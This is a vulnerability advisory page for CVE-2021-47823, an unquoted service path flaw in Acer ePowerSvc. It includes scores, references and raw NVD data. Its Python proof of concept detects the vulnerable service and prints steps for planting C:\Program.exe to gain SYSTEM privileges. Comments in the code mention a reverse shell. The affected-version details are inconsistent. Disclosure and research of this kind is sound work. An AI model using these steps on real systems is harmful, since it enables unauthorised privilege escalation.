CVE-2021-47823

Description

Acer ePowerSvc 6.0.3008.0 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Acer ePowerSvc < 6.0.3008.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47823 PoC - Unquoted Service Path Exploitation
# Target: Acer ePowerSvc Service
# This PoC demonstrates how to exploit the unquoted service path vulnerability

import os
import subprocess
import time

def check_vulnerable_service():
    """Check if the target service exists and is vulnerable"""
    # Check the service configuration using sc command
    try:
        result = subprocess.run(
            ['sc', 'qc', 'ePowerSvc'],
            capture_output=True,
            text=True,
            timeout=10
        )
        if 'BINARY_PATH_NAME' in result.stdout:
            print("[+] ePowerSvc service found")
            # Extract the path to check if unquoted
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f"[+] Service path: {path}")
                    if '"' not in path and ' ' in path:
                        print("[+] Service path is UNQUOTED and contains spaces - VULNERABLE!")
                        return True
        return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_malicious_executable():
    """Create a malicious executable to be placed at intermediate path"""
    # In real attack, this would be a reverse shell or other malicious code
    malicious_code = '''
#include <windows.h>
#include <stdio.h>

int main() {
    // This would contain actual malicious code
    // For demonstration, create a simple message box
    MessageBox(NULL, 
               "Acer ePowerSvc Exploited!\nCheck C:\\ for Program.exe", 
               "CVE-2021-47823", 
               MB_OK | MB_ICONWARNING);
    
    // In real attack, would spawn a reverse shell with SYSTEM privileges
    // system("cmd.exe /c ...");
    
    return 0;
}
'''
    print("[+] Malicious executable template created")
    print("[+] In real attack: compile and place as C:\\Program.exe")
    return True

def exploit():
    """Main exploitation function"""
    print("=" * 60)
    print("CVE-2021-47823 - Acer ePowerSvc Unquoted Service Path")
    print("=" * 60)
    
    if not check_vulnerable_service():
        print("[-] Target service not found or not vulnerable")
        return False
    
    print("\n[*] Exploitation steps:")
    print("1. Create malicious executable: C:\\Program.exe")
    print("2. Wait for service restart or system reboot")
    print("3. Malicious code executes with SYSTEM privileges")
    
    create_malicious_executable()
    
    print("\n[!] Note: Requires write access to service path directories")
    print("[!] Actual exploitation should be performed in controlled environment")
    
    return True

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47823
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47823
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47823/
[4] VulDB https://vuldb.com/cve/CVE-2021-47823
[5] https://www.acer.com
[6] https://www.exploit-db.com/exploits/49900
[7] https://www.vulncheck.com/advisories/epowersvc-epowersvcexe-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47823", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:07.027", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Acer ePowerSvc 6.0.3008.0 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Acer ePowerSvc 6.0.3008.0 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar código potencialmente con privilegios de sistema elevados. Los atacantes pueden explotar la ruta sin comillas en la configuración del servicio para inyectar código malicioso que se ejecutaría con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.acer.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49900", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/epowersvc-epowersvcexe-unquoted-service-path", "source": "[email protected]"}]}}